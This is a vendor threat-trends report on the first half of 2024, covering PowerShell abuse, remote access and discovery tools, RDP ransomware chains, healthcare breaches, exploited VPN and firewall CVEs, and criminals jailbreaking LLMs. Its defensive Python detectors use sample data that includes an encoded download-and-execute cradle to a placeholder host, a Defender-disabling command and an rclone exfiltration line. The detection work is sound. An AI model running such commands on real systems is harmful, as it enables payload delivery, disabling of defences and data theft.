First-Half Threat Trends of 2024
Insights into emerging threats alongside ready-to-deploy detections
The Forge ensures that our Armory—our repository of advanced detection rules—is continuously updated with the latest adversarial techniques. These detections are made available on our Anvilogic Forge GitHub repository to foster community engagement and shared learning with ready-to-deploy content. Our Anvilogic Platform Armory has enhanced the rich metadata to help users elevate their content development capabilities.
The purpose of the Armory and the GitHub repository is to empower security practitioners with actionable intelligence and detection capabilities. We enable a more comprehensive defensive posture by focusing on the sequence of actions necessary for an attacker’s objective rather than isolated attack components. Our repository includes many threat detection use cases formatted in SPL, SQL, and soon KQL to address common exploitation techniques. This initiative is part of our commitment to fostering a collaborative and safer digital environment.
This report highlights key threat trends observed in the first half of the year, focusing on the pervasive use of PowerShell in cyberattacks, the rise of remote access tools, the exploitation of external discovery tools, and sophisticated social engineering tactics. Alongside each threat, we provide ready-to-use detection rules, guides, and documentation in the repository to help you understand each detection's purpose, scope, and implementation.
Here are the top areas of focus in the first half of 2024:
Forging Ahead: Navigating the Evolving Cyber Threat Landscape This Year
Command and Scripting Interpreter: PowerShell (T1059.001)
PowerShell remains a favored tool among cybercriminals due to its high versatility and utility. Ranking consistently as a top attack technique, this powerful command and scripting interpreter enables threat actors to execute a range of commands that can download files, manipulate system settings, and run complex scripts relatively easily. Its integration with the Windows operating system and extensive capabilities make it an ideal choice for system administrators and attackers alike. Through the first half of 2024, numerous cyber incidents have shown adversaries using PowerShell throughout the attack chain to facilitate their intrusions.
PowerShell has become an integral tool for adversaries due to its flexibility, deep integration with the Windows operating system, and the rise in the use of living-off-the-land Binaries (LOLBins). Attackers frequently use PowerShell to download additional payloads by leveraging commands like Invoke-Expression or the DownloadFile parameter. These methods allow adversaries to execute code or retrieve malicious files from the internet, thus expanding their attack arsenal and proceeding further in their intrusion.
Adversaries can also employ encoded commands to obfuscate their activities, making detection more challenging. This technique involves converting PowerShell scripts into encoded formats that can evade simple signature-based detection mechanisms. The use of the EncodedCommand parameter is particularly prevalent, enabling attackers to hide the true intent of their scripts. PowerShell scripts are also commonly used for a variety of malicious purposes. For instance, scripts may be designed to harvest credentials, manipulate registry settings, or establish backdoors.
Understanding these specific uses of PowerShell is essential for detection engineers. Implementing detections for common PowerShell abuse patterns, such as monitoring for Invoke-Expression and DownloadFile usage, detecting encoded commands, and scrutinizing script execution behaviors, can enhance an organization’s defensive posture. By focusing on these techniques, detection engineers can develop more targeted and effective defenses against trending PowerShell-based attacks. One of the most significant examples of PowerShell detection in practice should be credited to Red Canary for its identification of various suspicious PowerShell executions, enabling the prevention of a ransomware attack against a healthcare entity.
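The three abuse patterns named above (Invoke-Expression, DownloadFile, and -EncodedCommand) can be checked directly against process-creation command lines. The following Python is an added example written for this report, not a rule from the Forge repository: it decodes the UTF-16LE/base64 payload behind -EncodedCommand (accepting every prefix abbreviation powershell.exe allows, an assumption that errs toward catching rare spellings), then scans both the visible command line and the decoded script for the cradles. The DownloadString pattern and the sample command lines are constructed additions.

```python
import base64
import binascii
import re

# Every prefix of "encodedcommand" that powershell.exe accepts as an
# abbreviation (-e, -ec, -en, -enc, ... -encodedcommand). Treating all
# prefixes as aliases is an assumption; -e/-ec/-enc are the common forms.
ENCODED_ALIASES = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}

# "-name value" or "/name value" pairs; the value class is the base64 alphabet.
PARAM_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Behaviours the report calls out (Invoke-Expression / IEX, DownloadFile),
# plus the closely related DownloadString cradle (added assumption).
TECHNIQUE_PATTERNS = {
    "invoke_expression": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
    "download_file": re.compile(r"(?i)\.downloadfile\("),
    "download_string": re.compile(r"(?i)\.downloadstring\("),
}


def extract_encoded_payload(cmdline):
    """Return the script hidden behind -EncodedCommand (any alias), or None.

    PowerShell encodes the script as UTF-16LE and then base64; an argument
    that is not valid base64 is reported as None rather than raising.
    """
    for name, value in PARAM_RE.findall(cmdline):
        if name.lower() not in ENCODED_ALIASES:
            continue
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            return None
        return raw.decode("utf-16le", errors="replace")
    return None


def analyze_powershell(cmdline):
    """Flag encoded commands and download/execution cradles in one command line."""
    decoded = extract_encoded_payload(cmdline)
    findings = []
    if decoded is not None:
        findings.append("encoded_command")
    # Scan the visible command line and the decoded script together, so a
    # cradle wrapped in -EncodedCommand is still caught.
    haystack = cmdline + "\n" + (decoded or "")
    for label, pattern in TECHNIQUE_PATTERNS.items():
        if pattern.search(haystack):
            findings.append(label)
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings}


def encode_for_powershell(script):
    """Build a -EncodedCommand argument the way PowerShell expects (UTF-16LE + base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation command lines (not from the report).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')",
    "powershell.exe -Command Get-Process | Sort-Object CPU",
    "powershell.exe -w hidden -enc " + encode_for_powershell("whoami"),
]


def run_samples(lines=SAMPLE_COMMAND_LINES):
    """Analyze each sample line; returns one result dict per line, in order."""
    return [analyze_powershell(line) for line in lines]


if __name__ == "__main__":
    for result in run_samples():
        print(result["findings"], "<-", result["cmdline"][:60])
```

Decoding before matching is the point: a signature on the literal string `DownloadString` never fires on the first sample, because on the wire it is only base64, while the decoded script exposes both the cradle and the IEX alias.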
Trending techniques with actionable detections
Association
Remote Access Software (T1219)
Threat actors have been using remote access tools (RATs) extensively in the first half of 2024. These tools enable attackers to gain remote access to compromised systems and establish persistent footholds within target networks. Delivery methods often involve initial social engineering tactics, such as phishing campaigns that trick victims into downloading the software, typically under the guise of legitimate help desk or support services.
A notable development this year has been the exploitation of an authentication bypass vulnerability in ConnectWise ScreenConnect (CVE-2024-1709). Ransomware gangs, including Black Basta, Bl00dy, LockBit, and Play, have actively exploited this vulnerability. Remote access software is also frequently used in attacks to enhance an attacker's control and persistence within a compromised system or network. Commonly observed remote access tools include AnyDesk and ScreenConnect, which are often leveraged due to their popularity and robust functionality. By abusing these tools, attackers can remotely control victim machines, exfiltrate sensitive data, and deploy additional malware, all while maintaining a low profile and evading detection.
Trending techniques with actionable detections
Threat actor associations
Ransomware gang associations
Usage of External Third-Party Tools for Discovery
As with remote access software, an accurate asset and software inventory matters here because it lets defenders monitor for the powerful and potentially dangerous tools adversaries use for network and system discovery to map pathways through the network.
Threat actors have increasingly turned to external third-party tools for discovery purposes, aiding in host and domain reconnaissance activities. Tools such as AdFind, Advanced IP Scanner, SoftPerfect Network Scanner, and PowerShell custom modules like Invoke-ShareFinder are crucial in facilitating threat actors' ability to navigate their intrusion. These tools, which are not native to the Windows operating system, have been widely used to gather information about network topology, Active Directory structures, and connected devices.
Adopting these tools allows attackers to efficiently map out target environments and identify potential weaknesses that can be exploited in subsequent stages of their attacks. This trend emphasizes the need for comprehensive network monitoring and the importance of detecting unauthorized use of such tools to mitigate the risks associated with their abuse and better protect the network.
Trending techniques with actionable detections
Threat actor associations
Ransomware gang associations
Threat Scenarios for Trending Threats
Monitoring Identity Providers (IdPs) is crucial, with Okta continually warning of rising attacks. Advisories from Okta highlighted a spike in credential stuffing attacks from April 19, 2024, to April 26, 2024, with attackers using residential proxies to obscure their activities. This spike aligns with observations from Duo Security and Cisco Talos, noting increased attacks from March 18 to April 26, 2024. Additionally, credential stuffing attacks targeting Okta's Cross-Origin Resource Sharing (CORS) feature have increased since April 15, 2024, primarily targeting endpoints that facilitate cross-origin authentication.
Put telemetry together to identify sequences of threat activity: monitor for social engineering attacks centered on the compromise of Okta credentials, monitor logon events from suspicious sources, and detect techniques indicative of MFA bypass leading to unauthorized account usage.
Sequence threat techniques for Anvilogic customers
Compromised RDP credentials can enable a critical series of events, allowing threat actors to advance their intrusion on a compromised network. As demonstrated by ransomware operators Akira, BianLian, and Phobos, gaining access through RDP can lead to extensive system tampering, data exfiltration, and persistence. For instance, BianLian operators often purchase compromised credentials from initial access brokers and use RDP to establish footholds, disable security services using LOLBins like PowerShell, and deploy custom implants for command and control. They further leverage tools like Advanced Port Scanner and SoftPerfect Network Scanner for system discovery and exfiltrate data using Rclone and FTP, causing severe disruptions to the victim's network.
Similarly, Phobos ransomware actors exploit vulnerable RDP ports to gain initial access, followed by deploying executables for privilege escalation and maintaining persistence. They utilize tools such as Smokeloader and Cobalt Strike for reconnaissance and bypassing network defenses. Akira ransomware operators also exploit RDP, often alongside phishing and VPN vulnerabilities, to establish persistence and disable security solutions using techniques like Bring Your Own Vulnerable Driver (BYOVD). They exfiltrate data using tools like FileZilla and WinSCP before deploying their encryptors. These examples underscore the need for robust security practices, such as multi-factor authentication and regular monitoring of RDP activity, to prevent such intrusions and protect organizational networks.
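The RDP chain described above (RDP logon, security services disabled with PowerShell, scanner-based discovery, exfiltration with Rclone or an FTP client) is a sequence, and the Okta guidance earlier on this page (suspicious-source logon followed by MFA bypass and account use) is the same shape with different stages. The Python below is an added example written for this report, not Anvilogic's detection content: a small per-host correlator that requires the stages to appear in order within a time window, run over constructed, normalized Windows telemetry. The binary names for the discovery and exfiltration tools are assumptions about how the products named here appear on disk, and the same `find_sequences` function takes any ordered chain, so the Okta scenario is expressed by swapping in classifiers for Okta System Log events.

```python
import re
from collections import defaultdict

# Constructed, normalized Windows telemetry (not from the report). Each event is
# either a logon (Security 4624 with its LogonType) or a process creation.
EVENTS = [
    {"ts": 100, "host": "srv01", "user": "jdoe", "kind": "logon", "logon_type": 10, "src_ip": "203.0.113.7"},
    {"ts": 160, "host": "srv01", "user": "jdoe", "kind": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": 400, "host": "srv01", "user": "jdoe", "kind": "process", "image": "netscan.exe",
     "cmdline": "netscan.exe /range:10.0.0.1-10.0.0.254"},
    {"ts": 900, "host": "srv01", "user": "jdoe", "kind": "process", "image": "rclone.exe",
     "cmdline": "rclone.exe copy C:\\Finance remote:bucket"},
    # Administrator doing routine work over RDP: a logon alone is not a chain.
    {"ts": 120, "host": "srv02", "user": "admin", "kind": "logon", "logon_type": 10, "src_ip": "10.0.5.2"},
    {"ts": 200, "host": "srv02", "user": "admin", "kind": "process", "image": "notepad.exe", "cmdline": "notepad.exe"},
    # Backup job using rclone with no RDP logon before it: not the chain either.
    {"ts": 50, "host": "srv03", "user": "svc_backup", "kind": "process", "image": "rclone.exe",
     "cmdline": "rclone.exe sync D:\\Backups remote:archive"},
]

# Stage classifiers. Tool binary names are assumptions about what the products
# named in the report look like on disk, not identifiers taken from the report.
DISCOVERY_TOOLS = {"advanced_port_scanner.exe", "advanced_ip_scanner.exe", "netscan.exe", "adfind.exe"}
EXFIL_TOOLS = {"rclone.exe", "winscp.exe", "filezilla.exe"}
DEFENSE_DISABLE_RE = re.compile(
    r"(?i)(set-mppreference\b.*-disablerealtimemonitoring|(?:net|sc)(?:\.exe)?\s+stop\s)")


def is_rdp_logon(e):
    # LogonType 10 is RemoteInteractive (RDP) in Windows Security event 4624.
    return e["kind"] == "logon" and e.get("logon_type") == 10


def is_defense_disable(e):
    return e["kind"] == "process" and DEFENSE_DISABLE_RE.search(e.get("cmdline", "")) is not None


def is_discovery_tool(e):
    return e["kind"] == "process" and e.get("image", "").lower() in DISCOVERY_TOOLS


def is_exfil_tool(e):
    return e["kind"] == "process" and e.get("image", "").lower() in EXFIL_TOOLS


# Ordered chain for the RDP intrusion pattern described in the text.
RDP_CHAIN = [
    ("rdp_logon", is_rdp_logon),
    ("defense_disable", is_defense_disable),
    ("discovery", is_discovery_tool),
    ("exfil", is_exfil_tool),
]


def find_sequences(events, chain, key="host", window=3600, min_stages=None):
    """Correlate per `key`: the first stage must occur, and later stages must
    follow in order within `window` seconds of it. A chain reaching at least
    `min_stages` stages (default: all of them) yields one match per key."""
    if min_stages is None:
        min_stages = len(chain)
    by_key = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_key[e[key]].append(e)
    matches = []
    for k, evs in by_key.items():
        for start_idx, start in enumerate(evs):
            if not chain[0][1](start):
                continue
            hit = {chain[0][0]: start["ts"]}
            stage = 1
            for e in evs[start_idx + 1:]:
                if e["ts"] - start["ts"] > window:
                    break
                if stage < len(chain) and chain[stage][1](e):
                    hit[chain[stage][0]] = e["ts"]
                    stage += 1
            if stage >= min_stages:
                matches.append({"key": k, "stages": hit})
                break
    return matches


if __name__ == "__main__":
    for match in find_sequences(EVENTS, RDP_CHAIN):
        print(match)
```

Run as-is, only srv01 is reported, with the timestamp of each stage; the admin's RDP session and the backup job's rclone run each match a single stage and stay silent. Lowering `min_stages` trades precision for earlier warning, which is the usual tuning knob for a sequence rule.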
Sequence threat techniques for Anvilogic customers
Most Heavily Impacted Industry: Healthcare
In February 2024, Change Healthcare, a subsidiary of UnitedHealth, experienced a data breach. UnitedHealth CEO Andrew Witty revealed in his testimony that compromised credentials were used to access Change Healthcare’s Citrix portal, which lacked multifactor authentication. This security lapse allowed the ALPHV/BlackCat ransomware group to deploy ransomware and exfiltrate data, resulting in severe operational disruptions and financial losses estimated at $872 million. Witty’s testimony detailed the hardships caused by the ransomware attack, disrupting operations across the healthcare sector, from pharmacists having to manually submit claims to rural family medicine practices struggling to meet payroll. The breach was initially detected on February 12 when unauthorized access was gained through stolen employee credentials, escalating on February 21 with the deployment of ransomware. Despite a ransom payment of $22 million to protect sensitive data, the full scope of the breach remains under investigation, particularly concerning patient and provider data. Recovery efforts have included significant IT overhauls, such as replacing thousands of laptops and rebuilding data networks.
More recently, in May 2024, Ascension's healthcare network suffered extensive disruption due to a cyberattack, with recovery efforts ongoing. Nurses from Ascension hospitals nationwide, particularly at Providence Rochester Hospital in Michigan, reported severe impacts on patient safety due to the lack of access to electronic health records (EHRs). Forced to revert to paper records and manual operations, medical staff faced increased risks of errors and overwhelming workloads. The cyberattack hindered access to critical patient information and slowed down response times for lab results and essential medical procedures. The immediate effect on hospital operations was severe, with delays in urgent lab tests crucial for timely medical decisions. The nurses' union, Local 40, has voiced urgent concerns and put forth demands to mitigate the impact, including daily unit shift huddles, regular training sessions, weekly progress reports, and maintaining a maximum nurse-to-patient ratio of 4:1. The union also called for a temporary reduction in elective surgeries and non-emergent admissions to manage the current strain on resources more effectively.
The U.S. Department of Health and Human Services (HHS) issued a warning in April 2024 about an increase in social engineering attacks targeting IT help desks within the Healthcare and Public Health (HPH) sector. These attacks have succeeded due to the attackers' preparation, including ensuring calls originate from local area codes and using stolen personal details. The attackers have shown a preference for targeting employees in financial positions within healthcare organizations, using the guise of needing help with broken phones to request the enrollment of new devices for MFA. The HHS advisory is in line with the trends of social engineering attacks, but also the escalation of innovation in the use of social engineering, particularly aided through AI and AI voice cloning technology in these scams, making it increasingly challenging to verify the identity of callers remotely.
Vulnerabilities and Exploits Continue to Rise
Among the largest and most significant vulnerabilities this year were those in Ivanti Connect Secure VPNs. The main vulnerabilities involved the exploitation of CVE-2023-46805 and CVE-2024-21887, enabling unauthenticated remote code execution and command injection, respectively, which have led to significant breaches, notably of MITRE’s Networked Experimentation, Research, and Virtualization Environment (NERVE) network. Mandiant and Volexity reported that these vulnerabilities have been actively exploited by threat actors identified as UNC5221 and UTA0178, respectively. These actors demonstrated advanced tactics, including credential harvesting, lateral movement, and deploying webshells for persistent access.
Palo Alto Networks' GlobalProtect firewall devices dealt with a command injection vulnerability, CVE-2024-3400, rated with a maximum CVSS score of 10, enabling unauthenticated remote code execution on various versions of PAN-OS firewalls. Volexity researchers reported that a group tracked as UTA0218 exploited this vulnerability to execute arbitrary commands remotely on affected devices. Post-exploitation activities included the installation of a custom Python backdoor named UPSTYLE, enabling further malicious operations and lateral movement within victim networks. The attackers quickly moved through victims’ networks, extracting sensitive credentials and configuration data, highlighting the critical need for organizations to apply the released hotfixes promptly to mitigate this vulnerability.
Cisco Talos reported on the ArcaneDoor cyber-espionage campaign, exploiting two zero-day vulnerabilities in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls. These vulnerabilities, CVE-2024-20353 and CVE-2024-20359, allowed for denial of service and persistent local code execution. The state-backed group UAT4356, also known as STORM-1849 by Microsoft, exploited these vulnerabilities to compromise government networks globally, emphasizing the critical importance of patching and enhancing defense mechanisms for these devices.
These vulnerabilities highlight the urgent need for organizations to patch promptly and recognize the importance of a comprehensive detection engineering strategy. Focusing solely on specific zero-day CVEs is insufficient due to the rapid pace of vulnerability disclosures and the fact that adversaries can exploit vulnerabilities long before they are made public. Defenders should pay attention to the entire attack chain, understanding the sequence of activities that follow initial exploitation. Threat actors run their playbooks, conducting a series of actions to achieve their objectives. By focusing on common protocols and techniques used by attackers and by detecting their activities throughout the attack chain, we can develop more effective defenses. This approach enhances our ability to detect and respond to a broader range of threats, yielding detections that address the core TTPs of attackers rather than a singular exploitation method.
Strengthen Security Essentials to Better Combat AI Threats
Monitoring the abuse of large language models (LLMs) like ChatGPT by cybercriminals, Trend Micro reports a lag in AI adoption among criminals compared to mainstream industry usage. However, there has been a shift from attempts to develop proprietary criminal LLMs to manipulating existing ones through jailbreak techniques. Criminals are utilizing AI to streamline malware development and amplify the effectiveness of their social engineering tactics. These uses leverage AI's power to craft more convincing phishing campaigns and scam communications, often involving improved translations to break language barriers and target a broader victim base.
OpenAI, in collaboration with Microsoft Threat Intelligence, has taken action against five state-affiliated threat actors who attempted to exploit AI services for malicious cyber activities. These actors, including Charcoal Typhoon and Salmon Typhoon from China, Crimson Sandstorm from Iran, Emerald Sleet from North Korea, and Forest Blizzard from Russia, had their associated OpenAI accounts terminated. The activities of these threat actors ranged from researching companies and cybersecurity tools to generating content for phishing campaigns and understanding malware evasion techniques.
Microsoft's detailed investigation into these actors revealed specific behaviors aligned with their broader cyber espionage and operational goals. For instance, Forest Blizzard focused on researching satellite communication protocols and radar imaging technology, which may have applications in military operations. Emerald Sleet's activities included identifying defense experts and organizations, understanding vulnerabilities, and drafting phishing content. Crimson Sandstorm used AI services for app and web development support, content generation for spear-phishing campaigns, and malware evasion research.
Before AI-enhanced cyberattacks become widespread, defenders should focus on reinforcing basic security measures such as regular patching, MFA, and employee training on recognizing social engineering scams. By strengthening these foundational elements, organizations can better prepare for future challenges posed by AI-enhanced cyber threats, effectively using the time while cybercriminals are still experimenting with this new vector.
A Crucial Time for Improving Cyber Defense Strategies
Maintaining a strong security posture will safeguard operations and data from persistent threats. Staying informed with Anvilogic Forge will enable organizations to stay up-to-date with the latest developments in the cyber landscape and immediately operationalize intelligence with detection content.
The first half of 2024 has showcased the relentless evolution of cyberthreats, revealing both the ingenuity and persistence of adversaries. From the adept use of PowerShell and remote access software to manipulating external third-party tools, threat actors continuously enhance their methods to breach systems. Social engineering remains a widespread tactic, with attackers targeting help desks and using stolen credentials to circumvent security defenses. The healthcare sector, in particular, has faced significant challenges, with severe breaches disrupting patient care and hospital operations.
2024 Mid-Year Attack Trends and AI Insights
References
- Action Network: URGENT! Ascension Providence Rochester Medical Professionals Demand Safety Precautions in Hospital Amid Cyber Attack
- CISA: #StopRansomware: Akira Ransomware
- CISA: #StopRansomware: BianLian Ransomware Group
- CISA: #StopRansomware: Phobos Ransomware
- Cisco Talos: ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices
- CNN: ‘It’s putting patients’ lives in danger’: Nurses say ransomware attack is stressing hospital operations
- Ivanti: CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways
- Health Sector Cyber Coordination Center: Social Engineering Attacks Targeting IT Help Desks in the Health Sector
- Microsoft: Staying ahead of threat actors in the age of AI
- Palo Alto Networks Unit 42: Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400
- Reuters: FBI says Chinese hackers preparing to attack US infrastructure
- The Record: Any number given of Volt Typhoon victims ‘likely an underestimate,’ CISA says
- Trend Micro: An Update on How Cybercriminals Are Using GenAI
- Volexity: Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
- Volexity: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
Social Engineering Menace
Scattered Spider specifically targets IT support personnel with broad access, occasionally using threats against employees to coerce the surrender of corporate credentials. Their ability to gain a comprehensive understanding of their targets’ environments underscores their advanced social engineering techniques. Octo Tempest's proficiency is further demonstrated by manipulating privileged users and post-exploitation activities. Through extensive research into organizational systems, IT processes, and VPN architectures, they gain crucial insights for orchestrating their attacks. This deep understanding allows them to exploit organizational weaknesses effectively.
Similarly, Muddled Libra’s strategy includes compromising technology administrator accounts through refined help desk social engineering tactics. Their extensive research into applications and cloud service providers the organization uses enables them to escalate privileges and expand their attack surface. Muddled Libra's ability to manipulate and navigate through an organization’s Okta Identity Portal highlights its sophisticated approach to accessing and potentially manipulating sensitive data.
Additionally, in April 2024, the U.S. Department of Health and Human Services (HHS) issued a warning about an increase in social engineering attacks targeting IT help desks in the Healthcare and Public Health (HPH) sector. Attackers posing as hospital staff have attempted to bypass MFA by persuading help desks to enroll new devices using stolen personal details, such as Social Security numbers or corporate ID numbers, to gain unauthorized access to internal systems.
Understanding these social engineering tactics and the methods used by these threat actors is crucial for organizations to implement effective defenses. Comprehensive training for IT support staff, robust verification processes for sensitive requests, and enhanced monitoring of help desk activities are essential measures to mitigate the risks associated with these advanced social engineering attacks.